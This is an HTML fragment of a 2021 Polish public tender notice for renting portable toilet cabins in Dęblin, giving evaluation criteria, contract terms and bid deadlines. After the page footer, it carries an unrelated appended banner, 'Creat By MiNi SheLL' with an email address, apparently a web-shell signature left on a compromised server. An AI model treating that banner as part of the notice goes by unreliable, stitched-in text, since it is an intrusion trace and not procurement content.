class="mb-0">4.3.8.) Sposób oceny ofert: </h3> W kryterium „czas przystąpienia do usunięcia uszkodzenia/awarii należy podać pełne godziny (1 godzina = 60 minut).Czas ten będzie liczony od momentu zgłoszenia (tel. e-mail, fax) do przybycia przedstawicieli Wykonawcy do miejsca posadowienia kontenerów w celu usunięcia uszkodzenia/awarii.Maksymalny czas przystąpienia do usunięcia uszkodzenia/awarii wynosi: 36 godzin.Minimalny czas przystąpienia do usunięcia uszkodzenia/awarii wynosi: 5 godzin.Jeżeli Wykonawca zadeklaruje czas przystąpienia do usunięcia uszkodzenia/awarii krótszy niż 5 godzin, Zamawiający przyjmie do oceny minimalny (wymagany) czas 5 godzin, a w przypadku wyboru oferty Wykonawcy czas ten zostanie uwzględniony w umowie.Jeżeli Wykonawca zaoferuje czas przystąpienia do usunięcia uszkodzenia/awarii dłuższy niż 36 godzin albo jeżeli Wykonawca nie poda (nie wpisze) w formularzu cenowym czasu przystąpienia do usunięcia uszkodzenia/awarii, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 5 ustawy, z uwagi na jego wymaganie w tym zakresie zawarte w Opisie przedmiotu zamówienia.Ocenie podlegać będzie rok produkcji poszczególnych kontenerów/kabin przenośnych/umywalek liczony na podstawie informacji podanych w formularzu oferty i weryfikowany w momencie dostawy.Jeżeli Wykonawca nie wskaże roku produkcji kontenerów/kabin przenośnych/umywalek Zamawiający przyzna 0 pkt.Zamawiający, w celu oceny ofert w kryterium „Rok produkcji kontenerów/kabin przenośnych/umywalek” w pierwszej kolejności przyzna odpowiednią ilość punktów za podany rok produkcji danego kontenera/kabiny przenośnej/umywalki. Finalną liczbę punktów w powyższym kryterium będzie stanowiła średnia arytmetyczna z liczby punktów przyznanych podzielona przez ilość kontenerów/kabin przenośnych/umywalek w danym zadaniu. Jeżeli Wykonawca nie wskaże daty produkcji wszystkich kontenerów/kabin przenośnych/umywalek w danym zadaniu Zamawiający obliczy średnią arytmetyczną z tych wskazanych i podzieli przez ilość kontenerów/kabin przenośnych/umywalek podanych w danym zadaniu. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wynajem przenośnych kabin toaletowych z umywalką w Dęblinie </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44211100-3 - Budynki modułowe i przenośne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Minimalny czas dostawy kabin przenośnych od momentu zgłoszenia przez Zamawiającego konieczności dostarczenia kabin wynosi 48 godzin.Maksymalny czas dostawy kabin przenośnych od momentu zgłoszenia przez Zamawiającego konieczności dostarczenia kabin wynosi 72 godziny.Jeżeli Wykonawca nie poda (nie wpisze) w formularzu oferty czasu dostawy kabin przenośnych to Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 5 ustawy.Jeżeli Wykonawca zaoferuje czas dostawy kabin przenośnych dłuższy niż 72 godziny, to Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 5 ustawy. Jeżeli Wykonawca zaoferuje czas dostawy kabin przenośnych krótszy niż 48 godzin, Zamawiający do oceny oferty przyjmie czas dostawy kabin przenośnych - 48 godzin, a w przypadku wyboru oferty Wykonawcy, do umowy zostanie wpisany termin zgodny ze złożoną ofertą. W kryterium „Czas dostawy kabin przenośnych” oceniany będzie czas, w jakim Wykonawca dostarczy 4 szt. kabin przenośnych do miejsca ich ustawienia wskazanego przez Zamawiającego.Czas dostawy kabin przenośnych liczony będzie od momentu zgłoszenia przez Zamawiającego konieczności dostarczenia kabin przenośnych (e-mail, fax.) do momentu ich dostarczenia do miejsca ich ustawienia wskazanego przez Zamawiającego.W przypadku zgłoszenia telefonicznego Wykonawca zobowiązany jest potwierdzić fakt otrzymania zgłoszenia na e-mail Zamawiającego.W kryterium „Czas dostawy kabin przenośnych” należy podać ilość pełnych godzin (1 godzina = 60 minut).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas dostawy kabin przenośnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Minimalny czas dostawy kabin przenośnych od momentu zgłoszenia przez Zamawiającego konieczności dostarczenia kabin wynosi 48 godzin.Maksymalny czas dostawy kabin przenośnych od momentu zgłoszenia przez Zamawiającego konieczności dostarczenia kabin wynosi 72 godziny.Jeżeli Wykonawca nie poda (nie wpisze) w formularzu oferty czasu dostawy kabin przenośnych to Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 5 ustawy.Jeżeli Wykonawca zaoferuje czas dostawy kabin przenośnych dłuższy niż 72 godziny, to Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 5 ustawy. Jeżeli Wykonawca zaoferuje czas dostawy kabin przenośnych krótszy niż 48 godzin, Zamawiający do oceny oferty przyjmie czas dostawy kabin przenośnych - 48 godzin, a w przypadku wyboru oferty Wykonawcy, do umowy zostanie wpisany termin zgodny ze złożoną ofertą. W kryterium „Czas dostawy kabin przenośnych” oceniany będzie czas, w jakim Wykonawca dostarczy 4 szt. kabin przenośnych do miejsca ich ustawienia wskazanego przez Zamawiającego.Czas dostawy kabin przenośnych liczony będzie od momentu zgłoszenia przez Zamawiającego konieczności dostarczenia kabin przenośnych (e-mail, fax.) do momentu ich dostarczenia do miejsca ich ustawienia wskazanego przez Zamawiającego.W przypadku zgłoszenia telefonicznego Wykonawca zobowiązany jest potwierdzić fakt otrzymania zgłoszenia na e-mail Zamawiającego.W kryterium „Czas dostawy kabin przenośnych” należy podać ilość pełnych godzin (1 godzina = 60 minut). <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie ze wzorem umowy § 11. ZMIANA UMOWY <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-03-29 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.law.mil.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-03-29 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-03-19 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com